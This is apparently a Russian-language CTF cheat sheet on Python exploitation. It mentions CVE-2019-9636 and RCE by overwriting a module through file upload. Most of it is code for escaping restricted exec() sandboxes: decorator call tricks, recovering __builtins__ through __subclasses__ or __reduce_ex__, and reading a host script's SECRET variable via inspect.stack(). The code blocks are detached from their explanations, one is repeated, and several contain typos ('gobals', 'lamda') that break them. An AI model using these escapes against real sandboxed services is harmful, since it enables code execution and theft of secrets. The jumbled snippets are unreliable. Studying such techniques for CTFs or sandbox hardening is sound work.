CVE-2019-9636 - (Python 2.7.16/3.7.2 <= ) пример эксплуатации: таск AquaWorld, SharkyCTF 2020: кратко, ошибка в парсинге unicode в url, в следствие чего можно было обратиться к локальному ресурсу:
Через File Upload, если можем писать в директорию с модулями. Если успеем переписать какой-то модуль до его первого импорта, то будет RCE. Mitigation: использовать zipap и определять директории, где могут находиться модули через sys.path
В Python возврат каретки \r то же самое, что и перенос строки \n.
unicode
Интерпретатору python все равно на unicode символы, он их попытается привести к ascii:
Работа с типами
Создание класса
Пусть наш код запускается следующим образом (у нас ограничен globals)
Без __build_class__ в builtins нельзя создать класс:
Декораторы и вызов функций через них
Декораторы — это функции, которые в питоне могут быть представлены почти к чему угодно. Например, фунциям. С помощью декораторов можно организовать вызов какой-либо функции, не используя круглых скобок. Ограничение: вызвать можно только функции, которые принимают 1 аргумент (хорошо, что некоторые функции настроены на непозиционные аргументы или на кортежи аргументов). Пример:
Другая форма вызова функции через декораторы:
Sandboxes
builtins через subclasses
Зачем нужен builtins? — это ключ к свободному выполнению кода в Python и за пределами контекста Python.
builtins из ничего
Допустим вас запустили в контексте, где нет builtins. Как до него добраться без __subclasses__()и не имея ни одного объекта из внешнего контекста? (все методы во всех гайдах опираются на метод subclasses)
Выбираемся (здесь как-то связано с pickle; пример без использования круглых скобок => без возможности вызова функций обычными способами):
reduce_ex принимает номер версии протокола pickle. Прием выше будет работать с протоколом 2 и выше.
Получаем доступ ко всем переменным в скрипте из builtins
Пример, что можно сделать, через builtins – например, получить доступ к переменным основного контекста. Пусть наш код запускается следующим способом:
И пусть мы уже получили каким-либо способом builtins. Тогда, через пакет inspect мы можем получить доступ ко всему стеку вызова основного скрипта:
yourcode = 'result = 1 + 1' # Здесь наш код
namespace = {
'__builtins__': {},
'result': None
}
exec(yourcode, namespace)
print(namespace['result'])
myfunc = lambda test:_ # Создаем функцию
gobals = myfunc.__globals__ # Получаем глобальные переменные скрипта
builtins = globals['__builtins__'] # Получаем ссылку на словарь, в котором определены все из пакета builtins (или не определены)
builtins['__build_class__'] = lamda *x: 3 # Здесь может быть любая функция
class C: pass # теперь этот код не будет вызывать ошибки, если builtins нет в globals переменных
result = object()
returnedValues = []
@returnedValues.append
@result.__class__.__subclasses__
class X: pass
# 1
a = f(b)
# 2
f = lambda x: x + 1
@f
@lambda _:2 # b=2
class a:0 # a=3
result = SomeObjectClassFromParentContext
builtins = [x for x in result.__class__.__subclasses__() if x.__name__ == "catch_warnings"][0]()._module.__builtins__
yourcode = 'result = 1 + 1' # Здесь наш код
namespace = {
'__builtins__': {},
'result': None
}
exec(yourcode, namespace)
print(namespace['result'])
builtins['__build_class__'] = lamda *x: 3
result = ''
x = []
# ''.__reduce_ex__(3)
@x.append
@result.__reduce_ex__
class X:
pass
# x — [(<function __newobj__ at 0x108e7b160>, (<class 'str'>, ''), None, None, None)]
builtins = x[0][0].__globals__['__builtins__']
yourcode = 'result = 1 + 1' # Здесь наш код
SECRET = 'it\'s secret' # З
namespace = {
'__builtins__': {},
'result': None
}
exec(yourcode, namespace)
print(namespace['result'])
Import = builtins['__import__']
stack = Import('inspect').stack()
for frameInfo in stack:
if 'SECRET' in frameInfo.frame.f_locals:
print(frameInfo.frame.f_locals['SECRET']) # it's secret
